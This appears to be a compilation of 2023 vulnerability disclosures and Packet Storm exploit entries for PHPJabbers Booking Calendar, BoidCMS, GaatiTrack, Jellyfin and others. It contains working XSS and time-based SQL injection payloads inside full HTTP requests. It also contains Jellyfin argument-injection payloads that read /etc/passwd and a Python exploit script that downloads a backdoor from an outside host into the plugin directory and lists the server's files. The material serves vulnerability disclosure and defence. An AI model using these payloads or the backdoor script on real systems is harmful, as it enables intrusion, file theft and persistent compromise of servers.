Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

CVE-2023-48208: PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting ≈ Packet Storm

Cross-site Scripting (XSS) - Reflected in GitHub repository mlflow/mlflow prior to 2.9.0.

**Cross-site Scripting in MLflow**

Moderate severity GitHub Reviewed Published Dec 7, 2023 to the GitHub Advisory Database • Updated Dec 12, 2023

GHSA-vwhf-3v6x-wff8: Cross-site Scripting in MLflow

strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.

CVE-2023-41913: Releases · strongswan/strongswan

CVE-2023-6568

Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.0. Unpublished and deleted product(s) can be added to checkout.

**Microweber Business Logic Errors**

Moderate severity GitHub Reviewed Published Dec 7, 2023 to the GitHub Advisory Database • Updated Dec 7, 2023

GHSA-3rpx-pgmf-j96h: Microweber Business Logic Errors

Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.

CVE-2023-6566

Jellyfin is a Free Software Media System for managing and streaming media. In affected versions there is an argument injection in the VideosController, specifically the `/Videos/<itemId>/stream` and `/Videos/<itemId>/stream.<container>` endpoints which are present in the current Jellyfin version. Additional endpoints in the AudioController might also be vulnerable, as they differ only slightly in execution. Those endpoints are reachable by an unauthenticated user. In order to exploit this vulnerability an unauthenticated attacker has to guess an itemId, which is a completely random GUID. It’s a very unlikely case even for a large media database with lots of items. Without an additional information leak, this vulnerability shouldn’t be directly exploitable, even if the instance is reachable from the Internet. There are a lot of query parameters that get accepted by the method. At least two of those, videoCodec and audioCodec are vulnerable to the argument injection. The values can be traced through a lot of code and might be changed in the process. However, the fallback is to always use them as-is, which means we can inject our own arguments. Those arguments land in the command line of FFmpeg. Because UseShellExecute is always set to false, we can’t simply terminate the FFmpeg command and execute our own. It should only be possible to add additional arguments to FFmpeg, which is powerful enough as it stands. There is probably a way of overwriting an arbitrary file with malicious content. This vulnerability has been addressed in version 10.8.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**As reported by @FredericLinn...**

An argument injection 1 in the VideosController, specifically the /Videos/<itemId>/stream and /Videos/<itemId>/stream.<container> endpoints is present in the current Jellyfin version. Additional endpoints in the AudioController might also be vulnerable, as they differ only slightly in execution.  
Those endpoints are reachable by an unauthenticated user, which is already known 2.

**Impact**

First of all: An unauthenticated attacker has to guess any itemId, which are completely random GUIDs. It’s a very unlikely case even for a large media database with lots of items. Without an additional information leak, this vulnerability shouldn’t be directly exploitable, even if the instance is reachable from the Internet.

There are a lot of query parameters that get accepted by the method. At least two of those, videoCodec and audioCodec are vulnerable to the argument injection. The values can be traced through a lot of code and might be changed in the process. However, the fallback is to always use them as-is, which means we can inject our own arguments.  
Those arguments land in the command line of FFmpeg.

Because UseShellExecute is always set to false, we can’t simply terminate the FFmpeg command and execute our own. It should only be possible to add additional arguments to FFmpeg, which is powerful enough as it stands. I’ve verified three possible exploitation vectors:

1.  overwriting arbitrary files with a zero byte file by specifying and additional output
2.  including text files into the final video via the draw text filter 3
3.  including any file as an attachment to the final video

There is probably a way of overwriting an arbitrary file with malicious content. FFmpeg can retrieve output via numerous protocols, after all. Maybe those protocols can even be used to gather NTLM hashes 4. That’s only speculation, though!

Things we could do with the arbitrary file read while only using Jellythings:

*   reset a user’s password (needs the username) and include the password reset file via the second vector from above, as we get the full path to the file in the resetting process
*   include the whole Jellyfin database and look for API keys or Easy-Access-Codes to gain access

The first case should only be possible from within the local network, but I don’t know how a reverse proxy would change things.  
It doesn’t really matter, because the file inclusion through stream attachments is a lot more powerful, anyway.

The passwords in the database are hashed, but the Easy-Access-Codes are plain text. Furthermore, Resetting a user’s password sets an Easy-Access-Code for that account, even if not specified before.  
With that, an attacker could include the database, look for a user with admin privileges, reset their password via the reachable login page and include the database again the get the access code.  
Again, I’m not completely sure about the local network aspect in the password reset process.

In the case of managing to gain admin privileges, the technique of replacing the media encoder with a malicious log file still applies in order to gain remote code execution.

While this is technically an unauthenticated arbitrary file inclusion, in reality it’s a lot more nuanced. Requiring a valid GUID makes unauthenticated exploitation highly unlikely, if not impossible.  
As it stands, the vulnerability is dangerous in the hands of a low-privileged user who has access to itemIDs and usernames already, especially given the implementation of the password reset functionality.

**As reported by @mawalu**

The call to ffmpeg in VideosController is vulnerable to argument injection. This injection can be leveraged to read and write arbitrary files on the jellyfin host. Combined with the plugin system and a restart of jellyfin it is also possible to gain remote code execution.

**Overview**

The VideoCodec parameter of the VideosController#GetVideoStreamByContainer controller gets passed to ffmpeg without any validation. Since all ffmpeg arguments are passed as a single string it is possible to add additional arguments.

Arbitrary read & write of files can be achieved using the -attach and -dump_attachment:t flags of ffmpeg and mkv containers.

The vulnerability requires the attack to know a media id as a result it can't be exploited by an unauthenticated attacker.

**Possible fixes**

Pass arguments to the new process as an array and not as a string. This way the injection of new arguments would no longer be possible. I'm not very experienced with c# but it looks like ProcessStartInfo.ArgumentList attribute seems to be relevant here.

**Example payload**

Read file:

    /Videos/{media}/stream.mkv?VideoCodec=libx264 -attach /etc/passwd 
    -metadata:s:1 mimetype=application/octet-stream
    

Extract using ffmpeg -dump_attachment:t downloaded_file.mkv

Write file:

    /Videos/{media}/stream.mkv?VideoCodec=libx264 /tmp/a.mkv 
    -dump_attachment:t 
    /config/plugins/configurations/Jellyfin.Plugin.Backdoor.dll -i 
    https://mawalabs.de/stuff/backdoor.mkv
    

The attachment of the hosted mkv file will be extracted to the plugin dir in this example.

**Exploit example**

import requests
import time
#import yt\_dlp

remote \= 'http://localhost:8096/'
media \= '8370335ee130690a60a26e56e39009af'
lport \= 1337
base \= 'https://mawalabs.de/stuff' \# location of the backdoor.mkv

def encode(p):
     return p.replace(' ', '%20')

def download(remote, media, file):
     payload \= encode(f"libx264 -attach {file} \-metadata:s:1 
mimetype\=application/octet\-stream")

     \# downloading the mkv container with curl / request fails. quickfix 
using ytdl
     #with yt\_dlp.YoutubeDL() as ydl:
     \# 
ydl.download(f"{remote}/Videos/{media}/stream.mkv?VideoCodec={payload}")

def upload(remote, media, file, base):
     payload \= encode(f"libx264 /tmp/a.mkv -dump\_attachment:t {file} \-i 
{base}/backdoor.mkv")

requests.get(f"{remote}/Videos/{media}/stream.mkv?VideoCodec={payload}")

def main():
     \# print("leaking file")
     \# download(remote, media, '/etc/passwd')

     print("uploading backdoor")
     upload(remote, media, 
'/config/plugins/configurations/Jellyfin.Plugin.Backdoor.dll', base)

     print("plz restart, waiting...")
     time.sleep(20)

     print("leaking filesystem")
     print(requests.get(f"{remote}/api/pwn/ls").text)

main()

1.  https://cwe.mitre.org/data/definitions/88.html ↩
    
2.  https://github.com/jellyfin/jellyfin/issues/5415 ↩
    
3.  https://ffmpeg.org/ffmpeg-filters.html#drawtext-1 ↩
    
4.  https://en.wikipedia.org/wiki/Pass\_the\_hash ↩

Tag

#git